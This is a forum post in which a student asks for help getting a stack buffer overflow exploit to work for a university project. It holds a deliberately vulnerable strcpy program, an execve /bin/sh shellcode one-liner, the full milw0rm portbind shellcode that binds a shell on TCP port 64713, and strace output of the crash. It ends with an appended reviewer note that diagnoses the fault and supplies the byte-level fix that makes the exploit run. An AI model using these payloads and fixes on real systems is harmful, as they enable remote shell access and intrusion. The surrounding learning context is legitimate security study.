Hi there,
I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's come to the topic: I'm playing around with buffer overflows because of a project at university. What I am trying to do is to exploit a really simple, self-written server remotely. The problem is the shellcode, which I did not write myself (shame on me) but found on milw0rm. To avoid complications because of the network I'm now trying local buffer overflows first:

[code]
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void A(char * args)
{
    char buffer[128];
    printf("Adresse von buffer: %x\n\n", buffer);
    memset(buffer, 'B', sizeof(buffer));
    strcpy(buffer, args);
    printf("\nbuff: [%s] (%p)(%d/%d)\n\n", &buffer, buffer, sizeof(buffer), strlen(buffer));
}

int main(int argc, char * argv[])
{
    A(argv[1]);
    return 0;
}
[/code]

That one works fine with a simple execve shellcode like this (that was for a smaller buffer...):

[code]
./target `perl -e '{ print "\x90\x90\x90\x90\xeb\x14\x5b\x31\xc0\x99\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; print "AAAAAA"; print "\x40\xf8\xff\xbf"; }'`
[/code]

Now I'm trying this shellcode:

[code]
/*
 * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
 * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
 *
 * portbind shellcode that bind()'s a shell on port 64713/tcp
 *
 */

char shellcode[] =
    /* socket(AF_INET, SOCK_STREAM, 0) */
    "\x6a\x66"              // push $0x66
    "\x58"                  // pop %eax
    "\x6a\x01"              // push $0x1
    "\x5b"                  // pop %ebx
    "\x99"                  // cltd
    "\x52"                  // push %edx
    "\x53"                  // push %ebx
    "\x6a\x02"              // push $0x2
    "\x89\xe1"              // mov %esp,%ecx
    "\xcd\x80"              // int $0x80

    /* bind(s, server, sizeof(server)) */
    "\x52"                  // push %edx
    "\x66\x68\xfc\xc9"      // pushw $0xc9fc  // PORT = 64713
    "\x66\x6a\x02"          // pushw $0x2
    "\x89\xe1"              // mov %esp,%ecx
    "\x6a\x10"              // push $0x10
    "\x51"                  // push %ecx
    "\x50"                  // push %eax
    "\x89\xe1"              // mov %esp,%ecx
    "\x89\xc6"              // mov %eax,%esi
    "\x43"                  // inc %ebx
    "\xb0\x66"              // mov $0x66,%al
    "\xcd\x80"              // int $0x80

    /* listen(s, anything) */
    "\xb0\x66"              // mov $0x66,%al
    "\xd1\xe3"              // shl %ebx
    "\xcd\x80"              // int $0x80

    /* accept(s, 0, 0) */
    "\x52"                  // push %edx
    "\x56"                  // push %esi
    "\x89\xe1"              // mov %esp,%ecx
    "\x43"                  // inc %ebx
    "\xb0\x66"              // mov $0x66,%al
    "\xcd\x80"              // int $0x80
    "\x93"                  // xchg %eax,%ebx

    /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
    "\x6a\x02"              // push $0x2
    "\x59"                  // pop %ecx
    "\xb0\x3f"              // mov $0x3f,%al     (dup_loop)
    "\xcd\x80"              // int $0x80
    "\x49"                  // dec %ecx
    "\x79\xf9"              // jns dup_loop

    /* execve("/bin/sh", ["/bin/sh"], NULL) */
    "\x6a\x0b"              // push $0xb
    "\x58"                  // pop %eax
    "\x52"                  // push %edx
    "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
    "\x89\xe3"              // mov %esp, %ebx
    "\x52"                  // push %edx
    "\x53"                  // push %ebx
    "\x89\xe1"              // mov %esp, %ecx
    "\xcd\x80";             // int $0x80

int main()
{
    int (*f)() = (int(*)())shellcode;
    printf("Length: %u\n", strlen(shellcode));
    f();
}

// milw0rm.com [2006-04-06]
[/code]

If I execute that program, the shell on port 64713 works fine. But if I use that shellcode on my target, it crashes before execve() — the strace below shows socket(), bind(), listen(), accept() and all three dup2() calls succeeding, then a SIGSEGV:

Code:
pentest@****up:~$ ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
Adresse von buffer: bffff418
buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
^C
pentest@****up:~$ strace ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
execve("./testoverflow", ["./testoverflow", "jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j\20QP\211\341\211"...], [/* 37 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320h\1\0004\0\0\0\344"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
mprotect(0xb7fc5000, 4096, PROT_NONE) = 0
mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "FN."..., 3) = 3
close(3) = 0
mprotect(0xb7fc6000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fcc000, 74923) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
write(1, "Adresse von buffer: bffff418\n\n"..., 30Adresse von buffer: bffff418
) = 30
write(1, "\n"..., 1
) = 1
write(1, "buff: [jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j"..., 168buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
) = 168
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 3221222540) = 0
accept(3, 0, 0x3) = 4
dup2(4, 2) = 2
dup2(4, 1) = 1
dup2(4, 0) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Regards, Seppel

[Reviewer note: the trace above shows every syscall up to the last dup2() succeeding, so the code dies between the exit of the dup2 loop and execve()'s int $0x80. The cause is where %esp sits when the shellcode runs. In the standalone test program the code executes from a global array while %esp points into main()'s frame; on the target it executes from the very stack buffer it pushes to. After the `ret` into the buffer at 0xbffff418, %esp is at the end of the 136-byte payload (0xbffff4a0), only 136 bytes above the shellcode's first byte. The socket/bind/accept stubs push 40 bytes (%esp reaches buffer+96), and the execve stub's `push %edx`, `push $0x68732f2f`, `push $0x6e69622f`, `push %edx`, `push %ebx` walk it down to buffer+76 — overwriting the tail of the 86-byte shellcode (the final `mov %esp,%ecx; int $0x80` at offsets 80–85) with the "/bin" bytes and zeros while it is about to execute. The zero bytes decode as `add %al,(%eax)` with %eax = 0xb, which is the fault. Fix: move %esp away from the code before the first push, e.g. prefix the shellcode with two NUL-free `sub $0x7f,%esp` instructions (`\x83\xec\x7f\x83\xec\x7f`) and reduce the padding from "A"x46 to "A"x40 so the return address stays at offset 132. Alternatively put the shellcode after the return address and return to it, so the pushes land in the padding below it — but re-check the printed buffer address then, since a longer argv shifts the stack.]